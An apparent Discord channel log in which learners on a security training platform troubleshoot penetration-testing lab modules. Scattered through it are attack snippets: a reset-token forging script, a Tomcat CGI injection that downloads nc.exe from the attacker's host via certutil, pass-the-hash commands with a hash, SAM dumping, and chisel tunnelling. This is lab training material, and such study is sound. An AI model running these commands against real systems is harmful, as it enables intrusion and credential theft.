#modules

1 messages · Page 239 of 1

ocean night
#

Latency on loading the machine resource perhaps, resulting in a delay in updating the UI?

fathom pendant
#

Interesting case indeed. I wonder if it's replicable on all vpns

ocean night
#

"You need to wait 2 minutes before spawning another machine"

#

I've been denied

fathom pendant
ocean night
#

Humbling

#

Ok yeah I see it, will raise with the team

#

Could perhaps just be lag in the UI loading, the data coming back from the server is fine 😦

#

If you are willing to reproduce in a recording or something @mint trout (either video recording or network logs, but I'd prefer not network logs.. as they are pretty... verbose..) I'd be curious to see the behaviour

#

Anyway, attempt to sleep #3, hit me up in DM if you're willing 🙂

#

The fact that the machine data is received, and then the UI is rendered based upon the data, a bit weird that it wouldn't show that right state

#

Scratch that 😅 It'll be due to latency which would cause a delay in a UI update, with the root cause being the inital state data not accurately reflecting the machine state.

#

Have reported to the team @mint trout - thanks

solar zodiac
#

sweet a new module just dropped 😄

#

❤️ academy

tiny brook
#

Hi

solar zodiac
#

Hi 🙂

tiny brook
#

How you doing

solar zodiac
#

good 😄

tiny brook
#

Are you good with hack the box

tiny brook
solar zodiac
#

im here 🙂 I can try and help but there are many people more knowledgable than me

tiny brook
#

Its ok if you’re a kind teacher

solar zodiac
#

🙂

fathom pendant
#

@tiny brook I don't accept random friend requests

tiny brook
#

I’m not random

tiny brook
fathom pendant
#

And you can google "intro to hack the box" and there's a help forum on how to get started

tiny brook
#

Not funny

cloud urchin
#

I can't connect to the VPN, tried US 2 and 3. I'm guessing this is on my end? Not seeing anyone else talking about stuff being down.

#

getting connection refused errors

#

working now, had to switch to us3 with udp

fathom pendant
short hare
#

Stuck on BROKEN AUTHENTICATION: Predictable Reset Token
Question:
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

I have the script ready for token generation and testing.
What I am no getting is this UTC time conversion. The time which is displayed in the webpage is already in UTC, but with this time right tokens are not generated. (I know [timestamp in milliseconds-1000] and [timestamp in milliseconds+1000] range thing)

Can anyone show to the correct way to do it? In which time should I convert it..!!!

#

And even converting to local remain same..!!
I am not getting it's logic

short hare
tiny brook
fathom pendant
short hare
# fathom pendant +/- 1 second for the proper token

change the script to +/-1
it resulted to generate only 2 tokens which are incorrect

I followed forums and others over here, everyone is taking about 1000 thing but now it's not working..!!
I am really not getting it

fathom pendant
short hare
#

I am using this to create the token md5_token = md5(str(x).encode()).hexdigest()
where x is the epoch time in milliseconds
do i need to modify something over here?

#
||from hashlib import md5

print ("Enter the time in milisec:\n")
time = int(input())

starttime = time-1000
endtime = time+1001

# loop from start_time to now. + 1 is needed because of how range() works
with open('tokens.txt', 'wt') as t:
    for x in range(starttime, endtime):
        md5_token = md5(str(x).encode()).hexdigest()
        print(md5_token,file=t)||

Here is the python code i am using. it generates a tokens.txt
This tokens.txt i just with wfuzz to check to correct token

Any corrections/suggestions will be helpful

hexed oyster
#

I have tried everything that I can think of for the answer to question 2 on the "Attacking web applications with ffuf". I've found 2 extensions and no combination of what I enter is correct. I've verified with external sources that I've got the correct information. What do?

#

alternatively, does Hack the Box have a forum where I can ask questions?

hexed oyster
#

It's the skills assessment section

cloud urchin
#

you can DM me your answer and i can double check

#

ohhh i see

ebon jasper
#

Hello everyone! Is there someone who finished ADCS attack module?

I need help badly to skill assessment
I followed ESC8 and ESC11 attack scenario I got stuck with coercer and PetitPotem
I am getting "The specified named pipe is in the disconnected state" error

#

I tried to target 2 IP I got stuck. It's been 10 hour. I appreciate anyone for help

cloud urchin
opaque forge
#

Powerhsell newbie. After importing PowerView.ps1, I try to run Get-NetUser -TrustedToAuth.
But I just get an error that a 'parameter cannot be found that matches' . If I run Get-NetUser without the parameter I don't get an error. What could I be doing wrong?

ebon jasper
cloud urchin
#

You need to find another way

steel gorge
#

I'm at your EDIT1 stage of this. I've done a lot of exploration but I might need to talk it through. Would you mind if I flicked you a DM about it?

Edit: never mind, I've just solved it. What a great puzzle. Yes, step back and strategise once all the bits are on the garage floor. Look at what each endpoint actually does.

opaque gulch
#

nmap is not working, can anyone help?

#

it is super slow

#

i connected with the ovpn file in one terminal, and opened another terminal to do nmap scans

#

This is the only place where I have permission to message, so sorry if I am on the wrong place

lavish mango
opaque gulch
#

no

#

I think the problem is with connecting to the ovpn file

#

in all videos that i have watched, after connecting to the vpn, the end line in the terminal is Initialization Sequence Completed

#

and then there is "tun 0" written somewhere

#

in my case, there are multiple lines after connecting to ovpn

#

and it is "tun 1" instead

next bronze
#

sudo killall openvpn then connect again, if you can ping the target ip, you're connected

opaque gulch
#

pinging to the ip is a success

#

but scanning using nmap is becoming very frustrating

#

even a simple nmap scan is taking more than a minute

next bronze
#

then it's not a vpn issue

#

depending on how you're scanning it can take a minute to hours whatcanisay

cloud urchin
#

Are you using your own virtual machine, or are you using the pwnbox?

opaque gulch
#

my own

#

i tried doing some of the machines that I tried using the pwnbox

#

and it worked

#

i can only conclude that nmap is really slow in my device for some reason

#

like what would take 1/2 second in the pwnbox might take around 10 in mine

#

anyone has any solution to this? or am I to be bound by this slow-ness of nmap?

lavish mango
karmic mantle
#

I've spent a lot of time in "Exploiting internal Web Applications II" trying to find the flag but it's annoying working with the exfil server. Are we able to create a web shell? Seeing as it's a public IP I figured we're not allowed to create web shells on these

opaque gulch
#

today i tried connecting using ovpn

#

will try again tomorrow

#

Thanks for all those who helped

cloud urchin
ashen frost
#

Hi in the password attack Module for CPTS.

For attacking SAM and attacking LSASS. When i try to transfer the dumpfile from the rdp session to the attack box. It always fails when i use the move command. Itgives me An unexpected network error occurred. I already set up the smb server with smb2 support and it still always fails for transferibnvtbe fail. I tried other means of transferring file but it still does not work

karmic mantle
#

I clicked the Hint button and it told me where the flag was

cloud urchin
ashen frost
#

How did you manage to solve the problem? You use humangod’s methodology?

ashen frost
primal mesa
#

Attacking Tomcat CGI

I am trying to get shell using the commands below, download was successful (200) when i checked my http server but when I dir, it wasn’t saved. Anyone know possibly why?
<victim IP>:8080/cgi/welcome.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F<IP>:8000%2Fnc%2Eexe+nc.exe

cloud urchin
cloud urchin
old atlas
#

is there a way to reset module progress?

acoustic owl
#

If you have completed a module, this button is available. I don't know if it resets the module

fringe urchin
acoustic owl
candid night
#

Hey everyone, I would like to ask for some tips regarding the last task in the "pass the hash" section of the "password attacks" module.
I'm trying to create a reverse shell to the target, using the Invoke-TheHash tool, but even tho the command says that it was executed, I don't get a connection in my ns.

I have tried changing the payloads, playing with different domain names, port numbers and I have also tried running these commands from other users using mimikatz, but to no avail. Can anyone push me in a right direction? I'm not sure what else I can do

pliant coyote
#

In Password Attacks Network Services, Why errors?

covert vortex
fringe urchin
pliant coyote
#

why?

candid night
covert vortex
# pliant coyote

User john is presented on this machine but with a different password, in my case I've found user c*** to log in to RDP

covert vortex
ancient parrot
pliant coyote
#

Why can't I crack it?

sour dust
#

I'm doing the Documentation & Reporting Practice Lab but it's painfully slow and keeps closing the connection. Is it just me or you guys also experienced this? I'm gonna take the exam in a couple of weeks, but if it's the same in the exam env then I will go crazy

covert vortex
pliant coyote
#

resource

#

Uh, I found that I could crack it out by using hydra instead of xhydra

young flume
#

hello team is someone can help with serverside module and nginx reverse proxy section

gray merlin
ancient parrot
gray merlin
# ancient parrot nice

Thank you! took me forever, but it is done. I have about a month before I take the test.

pliant coyote
winter edge
#

can someone help me solve PDFy challenge?

dim wolf
winter edge
#

someone told me i should ask here

dim wolf
#

PDFy is a challenge, this channel is for academy modules

buoyant escarp
#

Attacking Common Services, Medium
can someone tell me how many TCP ports i should see? found a post, they have another open port, ive restarted my box several times, scanned all tcp ports, but still dont find the "missing" service

buoyant escarp
#

ok ima restart box toll it works xd

fiery berry
#

I know sound silly but use the -p-

buoyant escarp
#

yea i do

#

those boxes are bugging quite often imo

rustic sage
#

Hey guys. Can you help me locate the area where you can see the Academy modules and it shows you where retired labs tie back to it if you need extra practice? I glanced at it a while ago, but I wanted some extra practice and I don’t know where to go for it.

rustic sage
vital falcon
buoyant escarp
#

finnaly this damn port is shown to me

rustic sage
#

How do you guys study for cpts. Do you do labs from retired machines or do you do it after you finish the academy

dim wolf
#

people have also done the Dante and Zephyr pro labs

rustic sage
#

I’ve been doing nothing but Academy stuff but I feel like I’m not tying it together well so I just paid for VIP plus so I can complement my studying

dim wolf
#

i've heard people say that doing the boxes doesn't help too much as much of what you see is out of scope on the exam

rustic sage
#

Hmm

#

Well I’d think it would get your mind right

#

Oh well

dim wolf
#

i definitely think it helps with understanding the process

#

and for that reason i think if you want extra practice, you should try doing a pro lab

astral beacon
#

Am I thinkibg myself or exercise related with window rdp is hard

#

one reason I sure is my own internet connection

rustic sage
#

So much to do so little time

astral beacon
#

also the gui is like prank on me or something

rustic sage
#

Hi
What would happen to my weekly streaks if I run out of boxes and modules I can purchase?
I'm currently at 21 weeks (kept my streak from the week weekly streaks were announced) and have purchased every tier 0 and one mini module from tier I, all and all with only 70 cubes. I have not finished all the modules I have purchased tho and 6 modules are remaining to be done but I'm curious is there any mechanic to preserve my streak if I'm not able to purchase more modules?

astral beacon
#

From my experience,there is not.
Btw streak can be done by doing exercises or complete a section 3 times

split glade
#

In intro to networking > VPN -> ??

clear bison
#

I am having trouble with the Windows File Uploads section of File Transfers module. Specifically with using the WebDav for SMB file uploads. I have gotten all the other methods for file downloads and uploads to work, and this is the only one I am having trouble with.

sleek moss
#

bruh i cant chisel on htb pivoting ubuntu@WEB01:~$ ./chisel client -v 10.10.14.171:1234 R:socks
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel)

#

the target device isnt updated

toxic apex
#

you can compile with no CGO and it will work

sleek moss
#

whats cgo

clear bison
#

Whoops. didn't mean to post that yet.
Anyway, SMB file uploads with WebDav :
I have started the WebDav server on my attack machine - I am using my own machine with a VPN, because if I used the PwnBox, it kept saying that port 80 was already in use.
Here is the command I used:

wsgidav --host=0.0.0.0 --port=80 --root=~/sharefolder --auth=anonymous

It appears to be running just fine. I placed a file in the designated root directory just so I could make sure I could see the file when connecting from the target windows machine.

I made sure I could ping my attack machine from the target machine, and that works fine.

I then enter this command from the PowerShell terminal on the target windows machine:

dir \10.10.15.197\DavWWWRoot

All I get is the following error:

"dir Cannot find path '\10.10.15.197\DavWWWRoot' because it does not exit"

toxic apex
#

Download the chisel source and golang. run it like so
CGO_ENABLED=0 go build main.go

sleek moss
#

ok damle

toxic apex
#

you can also try some earlier versions of the chisel program and see which versions of GLIBC are linked to it and try to find the right one. But I think compiling a new one will be easier

clear bison
#

I am having trouble with the Windows File Uploads section of File Transfers module. Specifically with using the WebDav for SMB file uploads. I have gotten all the other methods for file downloads and uploads to work, and this is the only one I am having trouble with.
Whoops. didn't mean to post that yet.
Anyway, SMB file uploads with WebDav :
I have started the WebDav server on my attack machine - I am using my own machine with a VPN, because if I used the PwnBox, it kept saying that port 80 was already in use.
Here is the command I used:

wsgidav --host=0.0.0.0 --port=80 --root=~/sharefolder --auth=anonymous

It appears to be running just fine. I placed a file in the designated root directory just so I could make sure I could see the file when connecting from the target windows machine.

I made sure I could ping my attack machine from the target machine, and that works fine.

I then enter this command from the PowerShell terminal on the target windows machine:

dir \10.10.15.197\DavWWWRoot

All I get is the following error:

"dir Cannot find path '\10.10.15.197\DavWWWRoot' because it does not exist"

Any help would be appreciated

mint trout
#

sorry, i went to sleep and didnt see this. that's the issue -- when it's working as intended on a refresh it shows still spawning however when I'm just sat here like a twat for 5-10 minutes and it still says Spawning, on a refresh I get the button to spawn the machine. It's so intermittent but when it happens again I will save the clip 👍

tame sphinx
#

I started the macos fundamentals module and i'm wondering if there is a macos vm or i need to have a mac ?

fathom pendant
#

Or a ton of googling

tame sphinx
#

ah shit, ok thanks, didn't see that part

civic locust
#

Hey. I am trying to get through Password Attacks PTH:

Invoke-SMBExec -Target \\172.16.1.5\\DC01\c -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "type david.txt" -Verbosec

But the commands outputs \172.16.1.5\DC01\david.txt did not respon
i tried many ips but nothing...

sleek moss
#
  • make clean
    CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16
    /home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
    WARNING: 'aclocal-1.16' is missing on your system.
    You should only need it if you modified 'acinclude.m4' or
    'configure.ac' or m4 files included by 'configure.ac'.
    The 'aclocal' program is part of the GNU Automake package:
    https://www.gnu.org/software/automake
    It also requires GNU Autoconf, GNU m4 and Perl in order to run:
    https://www.gnu.org/software/autoconf
    https://www.gnu.org/software/m4/
    https://www.perl.org/
    make: *** [Makefile:335: aclocal.m4] Error 127
    ubuntu@WEB01:~/ptunnel-ng$ ls
    aclocal.m4 config.guess contrib install-sh NEWS src
    AUTHORS config.log COPYING Makefile PKGBUILD test
    autogen.sh config.status debian Makefile.am PKGBUILD.dev web
    autom4te.cache config.sub depcomp Makefile.in README
    ChangeLog configure Dockerfile missing README.md
    compile configure.ac INSTALL model_file.c selinux
    ubuntu@WEB01:~/ptunnel-ng$ putnnel

Command 'putnnel' not found, did you mean:

command 'ptunnel' from deb ptunnel (0.72-3)

Try: sudo apt install <deb name>

ubuntu@WEB01:~/ptunnel-ng$ sudo ./ptunnel-ng -r10.129.153.190 -R22
sudo: ./ptunnel-ng: command not found
bruh why this not work

#

i tranffered ptunnel repo to target and then tried to make it but it ownt work

civic locust
mint trout
mint trout
civic locust
#

@mint trout maybe you know how to pass the hash correctly?

sleek moss
#

yes i did

civic locust
next bronze
#

smbexec gets you a shell, it doesn't open a file

civic locust
#

Okay then, but where is the output?

#

VERBOSE: Service GRXCSMRWOYFADTUQLFJK deleted on 172.16.1.5

#

I tried type david.txt but nothing outputty shows up

next bronze
#

wdym where is the output

#

what do you see?

civic locust
fathom pendant
#

Try without passing a command to it

civic locust
#
Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Verbose
VERBOSE: [+] inlanefreight.htb\david successfully authenticated on 172.16.1.5
[+] inlanefreight.htb\david has Service Control Manager write privilege on 172.16.1.5
fathom pendant
#

Also redact the hash as it's spoiler

civic locust
fathom pendant
#

I dont recall having too many issues with it tbh

sleek moss
#
config.status: executing depfiles commands
+ make clean
CDPATH="${ZSH_VERSION+.}:" && cd . && /bin/bash '/home/ubuntu/ptunnel-ng/missing' aclocal-1.16 
/home/ubuntu/ptunnel-ng/missing: line 81: aclocal-1.16: command not found
WARNING: 'aclocal-1.16' is missing on your system.
         You should only need it if you modified 'acinclude.m4' or
         'configure.ac' or m4 files included by 'configure.ac'.
         The 'aclocal' program is part of the GNU Automake package:
         <https://www.gnu.org/software/automake>
         It also requires GNU Autoconf, GNU m4 and Perl in order to run:
         <https://www.gnu.org/software/autoconf>
         <https://www.gnu.org/software/m4/>
         <https://www.perl.org/>
make: *** [Makefile:335: aclocal.m4] Error 127'```
i cant make ptunnel on the target device
fathom pendant
sleek moss
#

ok sorry but this module cant be ebaten

fathom pendant
#

I honestly skipped trying to make the ptunnel-ng

#

I just used a different method

sleek moss
#

do u have module flag then i can take

fathom pendant
#

¯_(ツ)_/¯

civic locust
#
 Invoke-SMBExec -Target 172.16.1.5 -Domain inlanefreight.htb -Username david -Hash & -Command "type D:\DC01\david\david.txt" -Verbose

What is wrong with it? I am struggling to do it 2 hours already

sleek moss
#

ok

fathom pendant
fathom pendant
#

That doesn't necessarily mean the file is on D:\

civic locust
#

But nothing works at all

#

i tried dir, tried type

fathom pendant
#

Try methods shown in the section

civic locust
#

i tried mimikatz

fathom pendant
#

Mimikatz will extract hashes

civic locust
#

there is two methods of doing this. shell and right away command

#

for shell there is no permission

#

command shows no output

fathom pendant
civic locust
#

Password Attacks Pass The Hash

fathom pendant
#

Try using mimikatz or rubeus to pth and create a new cmd and try accessing the share that way

civic locust
valid viper
#

I'm working on Password Attacks - Attacking SAM - Second Question:

When I go to copy the files from the Windows machine to my attack box via smbserver.py, the script works on my attacker box, but when I go to the Windows box and try to send the file, this is what I'm getting:

C:\move sam.save \10.10.15.3\CompData
The network path was not found.

fathom pendant
fathom pendant
valid viper
civic locust
valid viper
#

I followed the guide exactly.

#

I also tried pinging the attack box from the remote machine, no response.

#

Somehow I have 2 VPN connections...what the hell 😐

#

Okay, I can ping the other VPN connection from the Windows machine, so they are connected.

wanton idol
#

wdym 2 vpn connextions

valid viper
#

tun0 and tun1

#

Now it's saying:

Access is denied.
0 file(s) moved.

fringe urchin
#
\\Ip\Compdata
#

I guess you used 2x\ but discord funny

valid viper
fringe urchin
#

Well i did that section today and had no problem moving, it, run as admin thats it

#

If you have 2 vpns something funny. Restart both vpn connection and the boxshruge

valid viper
#

Let me try rebooting.

#

Yeah you're right about that.

#

Okay, got them.

fringe urchin
valid viper
#

Okay, now when running:

sudo python3 /usr/share/responder/tools/MultiRelay/impacket-dev/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

I'm not getting any output 😐

fringe urchin
valid viper
#

Same result.

fringe urchin
#

Check if any of those 3 files are empty

valid viper
#

I found another copy of the script...

#

That was the problem.

fringe urchin
valid viper
#

I'm on my own machine.

#

But yeah I didn't check the script :/

fringe urchin
#

Yea but there shiuld ne another script

valid viper
#

There's a few.

fringe urchin
#

A lotsadglas

valid viper
#

Is the hash before or after the colon?

#

It's before right?

fringe urchin
#

Its the last one

#

Like
Username:gdiwjOjsheoa;thiscorrecthash::::

valid viper
#

For some reason this module is kind of a pain.

fringe urchin
#

I enjoyed itkek

valid viper
#

Interesting.

fringe urchin
#

But if something goes wrong it can be pain

valid viper
#

I totally see the necessity though.

#

Especially if you're pentesting infrastructure. It's impossible not to need this.

fringe urchin
#

Ture. Well newer windows hash it differently but we still can crack them so if the passwords are crackable its neededpepeyesss

#

Ofc if we can dump it

pastel niche
#

I created a team but how do I invite my friend to my team???

#

Either I'm blind or dumbasf but I cannot for the life of me find out how

real tapir
urban tinsel
#

I am at the same state as you were when you posted Though, I never got an other ticket other than server01.inlanefreight.local. I have been running rubeus monitoring for more than 30 minutes. Did you solve the problem with rubeus or did you follow the linux path? Thanks

real tapir
#

Ok thanks. I also can't find the admin password. Can someone point me in the right direction?

fathom pendant
#

Just look around also some guessing can work too

rustic sage
fathom pendant
#

Could be a session cookie

#

Or something

dim wolf
#

it's demonstrating that in a pentesting engagement, you ought not to use easily guessable parameters (e.g., cmd)

#

in this case, they used an MD5 hash as the parameter which is not easily guessable

sleek moss
#

wju

sleek moss
#

bruh i RDP and SOCKS Tunneling with SocksOverRDP transferred over the socksoverdp but the freaking thing thing on target device wont load the dll even tho thats what the module says cause it says there a virus

#

regsvr32.exe SocksOverRDP-Plugin.dll
operation did not complete succesfully because the file contains a virus

cloud urchin
#

disable av/real time protection

sleek moss
#

it i

cloud urchin
#

how's it saying there's a virus if it's disabled?

#

if it's disabled it wouldn't be able to do that

sleek moss
#

idk

cloud urchin
#

you can DM me and I can help if you want

sleek moss
#

nvm i found it thank u u uwere right but wtf proxifier costs moeny??? awhy it ll us to use

cloud urchin
#

haha. free trial though

fathom pendant
#

Enterprise licensing goes brrr

manic fox
#

Hello guys does anyone here know anything about cyber security?

cloud urchin
#

no, that's why we're here, to learn

graceful mortar
manic fox
#

Someone threatened to swat me so my question is is it possible for someone to find my address from my tictoc acc?

cloud urchin
#

no

shut quest
#

Nope, we dumb

sleek moss
#

i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?

fringe urchin
sleek moss
#

yes they can and now i will find ur ip from dis cord >:)

manic fox
#

Any answers ?

surreal rain
shut quest
graceful mortar
fringe urchin
cloud urchin
fathom pendant
manic fox
#

No I’m asking for help to not get doxxed myself

surreal rain
#

Reread the question.

cloud urchin
#

alright sorry

manic fox
#

My tictoc is completley anonymous no information can be found on it

fathom pendant
manic fox
#

Is it still possible to find my address or no?

#

I don’t have any other accounts

fathom pendant
#

Not directly from tiktok

#

But I'm referring to other social media accounts

manic fox
#

Yh ik

cloud urchin
#

what module is this a part of?

manic fox
#

That’s the only account with a name like that, my other accounts on other media aren’t even remotely similar

fathom pendant
#

Anyway. Getting off topic

sleek moss
#

i configured proxifier for 127.0.01 1080 then i go to rdp and it doesnt rdp into the private network why?
how can i get proxifier to work

cloud urchin
sleek moss
#

theres no network traffic for proxifier

manic fox
#

I should be good then, thanks a lot 🙏

cloud urchin
sleek moss
#

i c ok danke

sour dust
#

anyone working on AD Skills Assessment Part II? My connection keeps getting closed after 15-20 seconds, totally unenjoyable and frustrating

fathom pendant
#

Try a different vpn region and tcp?

sour dust
#

I'm trying from the pwnbox but it's the same there

fathom pendant
#

Message support, it's weekend so you may not get a reply

sour dust
#

yea I already did but I really hope it's not going to be the same during the exam because it's impossible to do anything like this

dim wolf
#

the exam environment is more stable than the module environments

zealous rune
#

I'm doing end of module exercieses for the DNS enumeration section under Footprinting module

#

successfully managed to perform a zone transfer, but not seeing a txt record with a flag.... not sure if I misunderstood

buoyant escarp
#

Attacking Common Services, Hard

need a nudge

what ive done so far:
||got into SMB with Null Session, found some folders and interesting .txt files
brute forced RDP as user f.... and logged in via xfreerdp

from the outside i cant login mssql, and as user f.... i cant find anything that looks like a DB||

fathom pendant
fathom pendant
#

In command prompt

#

Or powershell

#

There's multiple questions

cloud urchin
#

ahh nm then

fathom pendant
#

One of them is the txt record

buoyant escarp
zealous rune
#

ok thx

buoyant escarp
#

does that mean bad login/password combo or does it mean something else?

#

bc it talks about driver

cloud urchin
#

the login failed, bad creds or the user doesn't have permission

buoyant escarp
#

hm im a bit lost, tried to impersonate the other two users with those creds lists from SMB by opening promt as a new user without success
also connecting to the DB as those user with the creds files no success. what am i missing?

sleek moss
#

RDP and SOCKS Tunneling with SocksOverRDP
i do all of it then when I connect to the 2nd pivot device it logs in then says network failed

#

how the frick can i make it work? it just fails network connection when i log in as jason

rustic sage
dim wolf
#
http://page.htb/param?dcfdd5e021a869fcc6dfaef8bf31377e=id
zealous rune
#

if i can do a zone transfer from a nameserver. what is the point of running a bruteforce via a script like dnsenum?

#

am i right in thinking that a zone transfer will give me everything and thus a bruteforce for more information is not necessary- at least by querying the dns server

buoyant escarp
#

i can impersonate 2 users inside sqlcmd, but both dont have sysadmin privs

heavy marsh
#

In the SQL Map HTTP Request section, why does
sqlmap 'http://<ip>/case3.php' --cookie='id=1' --dump --batch
not work, but
sqlmap 'http://<ip>/case3.php' --cookie='id=1*' --dump --batch

#

does work?

#

The way the module explained it, the * was only to specify one of multiple options

#

I'm getting an error
[16:52:20] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'

#

This should work

#

Also, --dump is not covered until the next section.

#

I'm in

#

--dump isn't covered until the next section on database enumeration

#

Am I supposed to read ahead to the end of the module (all sections) before trying the questions for each section?

#

Also, question 4 doesn't have any JSON data. Do I just use the regular header?

#

Nevermind, guess not

#

Where is the JSON data then?!

trail flicker
#

Could som1one please help me with this question

#

Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.

zealous flare
#

am I doing something wrong?

#

i have the \ aft er the {} but it's not showing in my cpy/pste

soft needle
trail flicker
valid viper
trail flicker
#

like write down all the unique records possible ?

valid viper
#

No, compare your output to what's in the lesson.

trail flicker
#

My fault. My outputs were the same i even tried digging deeper

wanton idol
#

finally made it to Attacking Common Applications, ima be dead T-T

split portal
#

Im doing AD enum & attacks, it gives incorrect creds when im trying to rdp from my windows but same creds are working when i rdp using my linux. Anyone knows what could be the reason?

next bronze
fathom pendant
#

You need to set the source port for your own connection as 53

#

With netcat

#

Wait

#

Literally just be patient

#

It can take up to a minute

#

Nope

#

I'm telling you to be patient with nc

#

No

#

Part of the module told you that you may need to use netcat, as nmap may not grab everything

#

Then you're not gonna like password attacks

#

A lot of this field is patience

#

Just don't get hung up on it

#

The intended way is with nc

#

Maybe it's not a banner

#

It could be

#

You're gonna run into situations where one tool doesn't get the answers but another does

#

And like I said, it could be coded to not be a banner, and instead be on a polling timer to send it every N seconds

#

It's not though

#

Just forget about it and move on

#

You're gonna have to get over that then

#

Because nmap can and will miss things, which is the point

grand sundial
#

I am working on the module: Password Attack - Pass the Ticket (PtT) from Linux. I have issue with evil-winrm. I was successfully connect to dc01 with Julio ticket, but when I ram any command, I got an error and the the evil-winrm terminate. PLease advise. Thank you very much.

#

here is the error I got:
Evil-WinRM PS C:\Users\julio\Documents> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:5985 ... OK
inlanefreight\julio
malloc_consolidate(): unaligned fastbin chunk detected
zsh: IOT instruction proxychains evil-winrm -i dc01 -r inlanefreight.htb

next bronze
fresh vector
#

has anyone ran into this issue with bloodhound python ERROR: Could not find kerberos credential cache file

fresh vector
#

I figured it out, I had to edit the krb5.conf file (made it perms 777)

upper ruin
#

AD Skill assessment 1.
Question: Submit this user's cleartext password.

I tried mimikatz with logonp-- even with the FXXL option, and I still didn't get anything. Any ideas what I can do?
I can try secretsdump.exe but I seriously don't get what kind of prompt/perimeters I should give.

next bronze
upper ruin
#

Fair point.

#

Ima try that, ty.

eager ledge
#

Hi, I am doing Pass the Hash (PtH) section exercise. While I have managed to get the david.txt file for

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
what I don't understand is that the command prompt that I get after executing mimikatz command using david's hash, shows MS01\Administrator when executing whoami. Both the powershell access has the privilege of user MS01/Administrator , then why in one instance I can access DC01, while on other I cannot?

ebon minnow
#

any hint for the list used for the kdbx archive on password labs - hard?

fathom pendant
fathom pendant
ebon minnow
fathom pendant
#

Password list, mutated password list, rockyou

ebon minnow
#

used them

fathom pendant
#

Generally try in that order

#

The password is in one of them

rustic sage
#

Anyone free to give me a hint as to why I can't crack the Administrator password for the "Password Attacks Lab - Hard" module? I've tried numerous time to brute force it with the mutated passlist and I get nothing.

fathom pendant
#

Did you use the 2john for it?

eager ledge
fathom pendant
eager ledge
#

How can I confirm that?

fathom pendant
#

It's one of those things that don't show up because windows is dumb

eager ledge
#

Just the fact that I am using David's hash should confirm that I have his privileges?

upper ruin
#

you cant be sure of stuff unless u try it out

fathom pendant
eager ledge
#

Okay thanks!

upper ruin
#

marcie I need a tip

ebon minnow
upper ruin
#

I got SAM save, security save and system save, and I wanna transfer them.

#

Actually nvm

fathom pendant
#

I used a fair bit of pivoting for the first one, since you're only given a web foothold

ebon minnow
fathom pendant
ebon minnow
#

the one in /opt/useful/seclists in the other modules is 133mb, used that before

sterile flower
fathom pendant
#

I think the seclists one is different

ebon minnow
#

generally brute forcing passwords shouldnt take more than 5-10min on htb right?

fathom pendant
#

The one I've used is default in my /usr/share/wordlists

upper ruin
fathom pendant
ebon minnow
#

right yeah

upper ruin
#

AD skill assessment 1 is burning me, but I am almost done

fathom pendant
#

And yes, the jump host they give has all the tools

upper ruin
#

thank god

#

so uh, I saw the drive option, I don't get what it does

#

does it create an active shared folder

ebon minnow
upper ruin
#

between the attack host and the one I am connected to

sterile flower
#

Hello friends, can someone help me on suricata skill assessment?

fathom pendant
upper ruin
#

I have no idea what I am doing wrong ima open up some documentation

#

Ohh drive name, path

fathom pendant
#

Or path,name

#

Iirc it works either way

upper ruin
#

well xfreerdp loaded, let's see where I can find that

fathom pendant
#

"This PC"

upper ruin
#

I don't think it worked

fathom pendant
#

Sorry I meant "network"

#

Getting over a nasty headache

upper ruin
#

folder empty

#

shiiii, yeah ur good dw

next bronze
#

\\tsclient\shareName

upper ruin
#

Will it work even if it doesn't show up?

fathom pendant
#

You also shouldn't need quotes for the filepath

upper ruin
#

that's the prompt I gave

next bronze
#

it should show up, you can try to access it in the command line ig

upper ruin
#

will try again with the quotes

fathom pendant
#

That looks fine to me

upper ruin
#

AHHH THERE WE GO

fathom pendant
#

Delete this

upper ruin
#

Looking hot

ebon minnow
upper ruin
#

check md5sum but not here

#

X_X

ebon minnow
#

||:keepass2john Logins.kdbx | grep -o "$keepass$.*" > CrackThis.hash ||

#

this command right?

upper ruin
#

i was about to ask why did u grep

fathom pendant
#

You can just redirect to a file

eager ledge
next bronze
ebon minnow
#

can i dm someone? feel like ive done all the necessary steps

inland fossil
kind venture
#

Hi everyone,
In the module 'System Information', after I connect using academy-regular.ovpn from my Vmware, I get this (screenshot) and it keeps saying permission denied. How do i make this work? I used the password as shown in the module but I keep getting this:

autumn pilot
#

Work on the syntax

kind venture
autumn pilot
#

Read the section of the module as it would hint you about the syntax of the SSH command if you are working on the Linux Fundamentals module

kind venture
kind venture
next bronze
#

you'll need to use the right username

kind venture
inland fossil
kind venture
kind venture
#

Wow! I got in!
I will make sure to read the syntax clearly next time.
Thank you all so much for the support!

placid edge
inner sand
#

guys my HTB academy of 8$ subscription renewed automatically and thats fine, but the problem is that my CC is empty even before the renewing day 😭

#

which was on 21th

winged egret
#

hello guys, in the pivoting module, everytime I run dnscat2.ps1 on the windows host, Im able to execute one command from the server then it disconnects throwing an error

#

is it a bug in the ps1 module of dnscat ?

cloud urchin
ebon minnow
#

null hashes for sam and system in the unlocked vhd, not a bug right?

password attack labs - hard

cloud urchin
#

it would greatly help if you put the module and section, but i think i recall something like that and nothing was bugged

ebon minnow
#

Ok, any tips going forward?

cloud urchin
#

you can dm me your steps and i can look at it

cosmic moth
#

how to access challenge channel

cloud urchin
#

